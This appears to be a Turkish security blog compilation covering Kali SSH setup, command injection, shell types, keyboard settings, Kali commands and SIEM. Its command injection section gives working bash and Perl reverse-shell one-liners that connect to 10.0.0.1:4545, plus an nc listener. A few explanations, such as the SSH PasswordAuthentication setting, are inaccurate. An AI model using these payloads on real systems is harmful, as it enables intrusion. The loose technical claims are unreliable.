Kali Linux’de SSH servisini açma

Kali Linux ü ilk kurduğunuzda SSH servisi disable gelir. Bunun ana sebebi ise  default tüm şifrelerinin internette bulunabilmesi.

Yani kali i kurduğunuzda  kali / kali   ikilisini,  sudo passwd root yazdığınızda da root için bir şifre belirleyebileceğinizi herkes bilir.

Eğer kali yi kurduktan sonra tüm default şifreleri değiştirmez iseniz ssh ınız açık olsaydı geçmiş olsun…

 

Şimdi SSH ı önce enable edelim sonrada start edecek komutları girelim.

Öncelikle ssh servisi yüklü mü kontrol edelim.

# apt list openssh-server

 

Eğer yüklü değil ise yükleme komutu:

# apt install openssh-server

 

Eğer enable etmez ise sürekli her açılmasında SSH kapalı gelir.

# systemctl enable ssh.service

 

Start etmek için komutumuz:

# systemctl start ssh.service

 

Son durumu görmek için birde status bakalım:

# systemctl status ssh.service

 

Eğer SSH bağlantısı yaparken kullanıcı şifre sormasını istemiyorsak:

PasswordAuthentication no

 

NOT: Disable, stop gibi komutları da kullanacak istediğimizi yapabiliriz.

Command injection güvenlik açığı

Command injection nedir?

Uygulama arayüzünde veri girişi yapılan yere işletim sisteminin anlayacağı bir komut yazdığımızda çalışıyorsa Command injection açığı var diyebiliriz kısaca.

  • ls -la       veya   dir   yazdığımızda işletim sisteminde bulunduğumuz dizindeki dosyalar listeleniyorsa şunlara bakabiliriz. dir  windows için  ls  linux işletim sistemi için.
  • pwd ile bulunduğumuz dizini görebiliriz.
  • revers shell alalım. Bunun için pentestmonkey de “Reverse Shell Cheat Sheet” var. Burada farklı dillerde çalıştırabileceğimiz komutlar var.
  • Kali yi açıp  nc – lvn 4545  portun dinleyelim.

 

Bash için:     bash -i >& /dev/tcp/10.0.0.1/4545 0>&1

PERL için:    perl -e ‘use Socket;$i=”10.0.0.1″;$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

 

Diğer diller için:  https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

 

Shell, Bind Shell, Reverse Shell Nedir?

Shell Nedir?

Shell (kabuk), bir işletim sistemiyle etkileşimli kullanıcı arayüzü için bir UNIX terimidir. Shell (Kabuk), kullanıcının girdiği komutları anlayan ve uygulayan programlama katmanıdır.
Bu sayede kullanıcıların bilgisayar komutları, metin veya komut dosyasıyla işlemleri yönetmesine izin verilir. Kısaca kullanıcıların, bilgisayarı yönetmek için kullandığı komutları yazdığımız terminl.

 

SHELL ATMAK NEDİR?

Farklı programlama dilleri kullanılarak meydana getirilen Shell’ler bir şekilde hedef web sitesi üzerine yüklenir. Ardından bu Shell yardımıyla sunucu üzerinde admin yetkilerine sahip olunur ve sisteme zarar verilebilir. Bu işleme internet dünyasında “Shell atmak” diyoruz. Shell’ler bazen sistemin açığıyla sunucuya yüklenirken bazen de bir script içerisinde veya dosya içerisinde yüklenebilmektedir.

Shell yardımıyla deneyimli bir bilgisayar korsanı paylaşımlı bir sunucu üzerinden herhangi bir barındırma servisi satın aldıktan sonra da sunucu üzerinde yetki sahibi olarak sizin barındırma hizmetinize ulaşarak bilgileri çalabilir veya sitenize zarar verebilirler.

 

Reverse Shell Nedir?

Reverse Shell, hedef makinenin saldırgan makineye geri iletişim kurduğu bir kabuk türüdür. Saldıran makinede, kod kullanarak veya komut çalıştırılarak elde edilen bağlantıyı aldığı bir dinleyici portu vardır. Bu porta hedef makinenin bağlantısını gerçekleştirdiği sırada salgırdan hedef makineyi ele geçirme işlemini tamamlamış olacaktır.

 

Bind Shell Nedir?

Bind Shell, hedef makineda son kullanıcının çalıştırmış olduğu zararlı kodun bir iletişim portu veya bir dinleyici açtığı ve gelen bir bağlantı için beklediği bir kabuk türüdür. Saldırgan daha sonra hedef makinesinin dinleyicisine bağlanır ve ardından sunucuda kod veya komut yürütmesine neden olur.

 

Reverse Shell ve Bind Shell Farkları Nedir?

Bind Shell de direkt hedef makinenin portuna bağlantı sağlanırken ;
Reverse Shell de saldırgan kendi portunu dinlerken hedef makinenin ilgili porta bağlanması olayıdır.

Kali Linux Klavyeyi Türkçe Yapma

Normalde aşağıdaki komutu terminale yazarak klavyeyi türkçe hale getirebiliyoruz ama Kali’yi restart – reboot attığımızda bu değişiklik gidiyor.

setxkbmap tr

Her restart sonrası klayve dilini tekrar türkçeye çevirmekle uğraşmamak için Kali’de işletim sistemi açılırken otomatik çalışmasını istediğimiz komutlar kısmına bu komutu ekleyebiliriz. Böylece elle terminale setxkbmap tr yazmak yerine Kali her açıldığında bunu bizim yerimize otomatik yapacaktır.

Adım 1:  Boş bir yerde sağ tıklayıp Application -> Setting -> Session and Startup  a gidelim.

 

Adım 2: Alttaki resimde 1 le işaretlenen yerdeki + ya basarak yeni command ekleyeceğiz. 2 ile işaretlediğim küçük pencere açılacak. Orada NAME kısmına sizi bu komutu hatırlatacak bir isim verin. Örneğin Turkce_Klayye  yada benim gidi direk komutu yazabilirsiniz. Önemli kısım COMMEND kısmı. Buraya çalışmasını istediğimi komutu yani  setxkbmap tr   yi yazacağız. Son olarak TRİGGER kısmına yani komutun tetiklenmesi – çalışması gereken durumu ON LOGIN olarak seçeceğiz ve OK ye basalım.

Adım 3:  Artık her restart yada Kali’yi açma sırasında bu komut çalışacak ve klavyeniz TR olarak gelecek.

NOT: Bu  Kali – Application Autostart özelliğini diğer işleriniz içinde kullanabilirsiniz. Hayal gücünüzü zorlayın manuel yaptığınız bazı işleri otomatize edebileceğinizi unutmayın.

Kali Komutları

Kali Linux kullanırken en çok işimize yarayacak komutları listeledik..

 

  • lsb_relase -a      // Kali dağıtımı, versiyonu gibi bilgileri verir.

root@kali:~# lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux Kali Linux 1.0.9
Release: Kali Linux 1.0.9
Codename: n/a

 

  • sudo apt upgrade    // Kali’nizi upgrade eder. Güncel paketleri yükler. Yüklenecek paketleri listeledikten sonra sayısını ve boyutu gösterip Y / N seçmenizi ister.

SIEM Projesi Nedir?

SIEM sistemleri sistemlerin, network cihazlarının, uygulamaların ürettiği logları saklayan ve bu loglar üzerinde detaylı ilişkilendirme (korelasyon) ve sorgular yapabilen sistemlerdir.

SIEM, Log izleme manasına gelmektedir. Sisteminizde bulunan tüm kritik ağlar ve cihazları kapsayan log yönetimi ve analizine SIEM projesi denilmektedir. Sistemin ürettiği olay kayıtlarının belirlenen kurallara göre analiz edilmesi olarak tanımlanmaktadır. SIEM Projeleri ile sistemin üretmiş olduğu logların kapsamlı bir şekilde toplanması, birleştirilmesi, saklanması ve doğru analizler gerçekleştirilmesi gibi adımlardan oluşan log yönetimi ise saldırının göstergelerini ve delillerini elde etmeyi ortaya çıkartabilir. Bu projelerin bir adı ise Log Yönetimi’dir.

 

SIEM ise log analizine göre daha ince detaylı yapılandırma ve raporlama seçenekleri sunmaktadır. SIEM’in en önemli özelliklerinden biri belirlenen politika ve kuralların yardımıyla bağımsız gibi görünen olaylar arasında anlamlı bağlantılar kurarak muhtemel saldırıları tespit etmeye yardımcı olan korelasyon tekniğidir. SIEM ürünleri çevre birimlerden uç kullanıcılara kadar sistemlerin ürettiği logları merkezi olarak toplayan, saklayan ve analiz eden sistemlerdir.

 

SIEM çözümleri (IBM Qradar, HP Arcsight, Mcafee SIEM ve Splunk)

 

SIEM Nedir?

SIEM sistemlerinin log üreten değil, logları toplayan, anlamlandıran ve alarm üreten bileşen olduğu unutulmamalıdır.

 

SIEM’in çalışma mekanizması:

– Toplanan logların global bir formata dönüştürülmesi ve olayların saldırı tipine göre sınıflandırılması yöntemlerini kullanarak normalleştirme ve kategorilendirme adımlarını uygulamak
– Bağımsız gibi görünen olayları birbiriyle bağlantılandırmak ya da olayları datayla ilişkilendirmek
– Yöneticilere mail, SMS veya SNMP mesajları ile bildirim veya alarm sağlamak
– Toplanan veri ve korelasyon sonuçlarını gerçek zamana yakın bir ölçüde güvenlik uzmanlarına sunan izleme paneli sağlamak
– SIEM ürünü tarafından toplanan verinin analiz aşamalarını kapsayan rapor üretmek

 

SIEM’in Önemi

SIEM ürünleri gerçek zamanlı raporlama ve güvenlik olayları analizi sağlayarak ağlara yönelik en son tehditleri tespit edebilme imkânını sunarlar. Ağ güvenliğine yönelik tehditler hızla yayılmakta ve her geçen gün yenileri ortaya çıkmaktadır.  Uzaktan erişim noktalarının ve ağlara bağlanan cihazların sayısındaki artış ağlara sızma noktalarının da çoğalmasına neden olmaktadır. Bilişimciler ağın karşı karşıya kaldığı tehditleri algılayabilmek için birden fazla kaynaktan toplanan veriyi analiz etmek ve bunların sonucunda atılacak adımları kararlaştırmak durumundadırlar. Saldırıların tespit edilmesi, dijital delillerin kaybedilmesine olanak vermeyecek şekilde daha fazla zararın oluşmasının önlenmesi, bütünsel bir güvenlik analizi raporlaması ve güvenlik tehditlerinin gerçek zamanlı olarak izlemeye alınması gibi önemli hizmetleri sunan SIEM ürünleri ağ geçidi, sunucular, güvenlik duvarları ve diğer kritik BT bileşenlerinin nasıl bir saldırı ile karşı karşıya kaldığı konusunda ayrıntılı rapor üretirler.

 

IBM® QRadar® Security Information and Event Management (SIEM), güvenlik ekiplerinin kuruluş çapındaki tehditleri doğru bir biçimde saptamasına ve bunlara öncelik vermesine yardımcı olur ve olayların etkisinin azaltılması için ekiplerin hızla müdahale etmesine olanak sağlayan akıllı içgörüler sunar. QRadar, ağınız çapında dağıtılmış binlerce aygıt, uç noktası ve uygulamadan günlük dosyası olaylarını ve ağ akışı verilerini birleştirerek, tüm bu farklı bilgileri ilişkilendirir ve olayların analiz edilmesini ve düzeltilmesini hızlandırmak için ilgili olayları tek uyarıda birleştirir.